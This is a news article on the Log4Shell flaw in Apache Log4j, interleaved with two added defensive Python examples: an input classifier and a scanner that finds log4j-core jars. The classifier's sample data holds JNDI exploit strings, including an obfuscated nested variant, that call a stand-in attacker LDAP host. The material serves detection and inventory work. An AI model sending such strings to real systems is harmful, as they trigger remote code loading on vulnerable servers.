
The Log4J Vulnerability Will Haunt the Internet for Years


A vulnerability in the open source Apache logging library Log4j sent system administrators and security professionals scrambling over the weekend. Known as Log4Shell, the flaw is exposing some of the world’s most popular applications and services to attack, and the outlook hasn’t improved since the vulnerability came to light on Thursday. If anything, it’s now excruciatingly clear that Log4Shell will continue to wreak havoc across the internet for years to come.

Hackers have been exploiting the bug since the beginning of the month, according to researchers from Cisco and Cloudflare. But attacks ramped up dramatically following Apache’s disclosure on Thursday. So far, attackers have exploited the flaw to install cryptominers on vulnerable systems, steal system credentials, burrow deeper within compromised networks, and steal data, according to a recent report from Microsoft.

The range of impacts is so broad because of the nature of the vulnerability itself. Developers use logging frameworks to keep track of what happens in a given application. To exploit Log4Shell, an attacker only needs to get the system to log a strategically crafted string of code. From there they can load arbitrary code on the targeted server and install malware or launch other attacks. Notably, hackers can introduce the snippet in seemingly benign ways, like by sending the string in an email or setting it as an account username.
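Because the trigger is nothing more than a logged string, a defender can check untrusted input fields for Log4j lookup syntax before they reach a logger or a SIEM. The following is an added example, not code from the article or from Apache: a small Python normalizer that collapses nested `${...}` lookups the way Log4j resolves them and then labels each value. The field names, the sample values and the 203.0.113.5 address are constructed for the demonstration.

```python
import re

# Innermost ${...} lookup: a body with no nested "${" or "}" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def normalize_lookups(text: str):
    """Collapse nested Log4j-style lookups from the inside out.

    Returns (flattened_text, lookup_count, saw_jndi). Case and default-value
    lookups are resolved the way Log4j resolves them; any other lookup is
    rewritten as <body> so the outer loop can keep going and still terminates
    (every pass removes at least one "${").
    """
    count = 0
    saw_jndi = False

    def resolve(match):
        nonlocal count, saw_jndi
        count += 1
        body = match.group(1)
        if ":-" in body:                       # ${name:-default} -> default
            return body.split(":-", 1)[1]
        name, sep, rest = body.partition(":")
        if sep and name.lower() == "lower":    # ${lower:X} -> x
            return rest.lower()
        if sep and name.lower() == "upper":    # ${upper:x} -> X
            return rest.upper()
        if sep and name.lower() == "jndi":     # the lookup Log4Shell abuses
            saw_jndi = True
        return "<" + body + ">"

    while True:
        text, replaced = INNER_LOOKUP.subn(resolve, text)
        if replaced == 0:
            return text, count, saw_jndi


def classify(value: str) -> str:
    """Label one untrusted input value for a logging pipeline or WAF rule."""
    _, count, saw_jndi = normalize_lookups(value)
    if saw_jndi:
        return "jndi-lookup"        # block and alert
    if count:
        return "unexpected-lookup"  # user input should never carry lookup syntax
    return "clean"


# Constructed sample values (field name, value); 203.0.113.5 is a documentation address.
SAMPLES = [
    ("user-agent", "Mozilla/5.0 (X11; Linux x86_64)"),
    ("username", "alice.example"),
    ("username", "${env:HOME}"),
    ("user-agent", "${jndi:ldap://203.0.113.5:1389/a}"),
    ("x-forwarded-for", "${${lower:j}ndi:ldap://203.0.113.5:1389/a}"),
]


def classify_samples():
    """Return the label for every constructed sample, keyed by its value."""
    return {value: classify(value) for _, value in SAMPLES}


if __name__ == "__main__":
    for field, value in SAMPLES:
        print(f"{classify(value):18} {field}: {value}")
```

The point of flattening first is that a plain substring match on `${jndi:` misses the nested forms, while a match after normalization catches them with the same rule. Labelling any lookup syntax at all as unexpected is deliberate: ordinary usernames, user agents and header values have no business containing it, so the cheaper rule catches variants the normalizer does not know about.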

Major tech players, including Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM have all found that at least some of their services were vulnerable and have been rushing to issue fixes and advise customers about how best to proceed. The exact extent of the exposure is still coming into view, though. Less fastidious organizations or smaller developers who may lack resources and awareness will be slower to confront the Log4Shell threat. 

“What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” says independent security researcher Chris Frohoff. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.”

The vulnerability is already being used by a “growing set of threat actors,” US Cybersecurity and Infrastructure Security Agency director Jen Easterly said in a statement on Saturday. She added that the flaw is “one of the most serious I’ve seen in my entire career, if not the most serious” in a call with critical infrastructure operators on Monday, as first reported by CyberScoop. In that same call, a CISA official estimated that hundreds of millions of devices are likely affected.

The hard part will be tracking all of those down. Many organizations don’t have a clear accounting of every program they use and the software components within each of those systems. The UK’s National Cyber Security Centre emphasized on Monday that enterprises need to “discover unknown instances of Log4j” in addition to patching the usual suspects. By its nature, open source software can be incorporated wherever developers want, meaning that when a major vulnerability crops up, exposed code can lurk around every corner. Even before Log4Shell, software supply chain security advocates had increasingly pushed for “software bills of materials,” or SBOMs, to make it easier to take stock and keep up with security protections.
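The "discover unknown instances of Log4j" step comes down to inventory: walking every host for archives that bundle log4j-core, including jars buried inside WARs and EARs. The following is an added example, not from the article or from Apache or the NCSC: a Python scanner that recurses through nested archives, reports each log4j-core instance by the Maven version it carries, and runs against a constructed deployment tree it builds itself. The class and pom.properties paths are those real log4j-core 2.x jars use; the sample WAR, jar names and version are constructed.

```python
import io
import os
import tempfile
import zipfile

# The lookup class Log4Shell abuses. It ships in every log4j-core 2.x build,
# so a hit means "log4j-core 2.x is here, now check the version".
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata that log4j-core jars carry; gives the version when present.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def _version_from_pom(zf):
    """Read version=... from the bundled pom.properties, or None if absent."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_archive(zf, location, findings):
    """Record log4j-core hits in one archive, recursing into nested archives."""
    names = set(zf.namelist())
    if JNDI_CLASS in names:
        findings.append({"location": location, "version": _version_from_pom(zf)})
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(inner, f"{location}!{name}", findings)


def scan_tree(root):
    """Walk a directory tree and return every log4j-core instance found."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, path, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def build_demo_tree():
    """Create a constructed deployment: a WAR bundling log4j-core plus a clean jar."""
    root = tempfile.mkdtemp(prefix="log4j-inventory-")
    log4j = io.BytesIO()
    with zipfile.ZipFile(log4j, "w") as zf:
        zf.writestr(JNDI_CLASS, b"")            # stand-in for the real class bytes
        zf.writestr(POM_PROPS, "version=2.14.1\nartifactId=log4j-core\n")
    os.makedirs(os.path.join(root, "webapps"))
    with zipfile.ZipFile(os.path.join(root, "webapps", "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", log4j.getvalue())
        war.writestr("WEB-INF/web.xml", "<web-app/>")
    with zipfile.ZipFile(os.path.join(root, "clean-lib.jar"), "w") as jar:
        jar.writestr("com/example/App.class", b"")
    return root


def demo_scan():
    """Build the constructed tree, scan it and return the findings."""
    return scan_tree(build_demo_tree())


if __name__ == "__main__":
    for hit in demo_scan():
        print(f"log4j-core {hit['version'] or 'unknown version'} at {hit['location']}")
```

The scanner reports presence and version only; deciding whether an instance is still exposed means comparing that version against Apache's advisory, and an archive whose log4j-core jar lacks `JndiLookup.class` is one where the published remove-the-class mitigation has already been applied. It does not see shaded builds that relocate the package, Log4j 1.x, or copies loaded from outside the scanned tree, which is exactly the gap an SBOM is meant to close.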
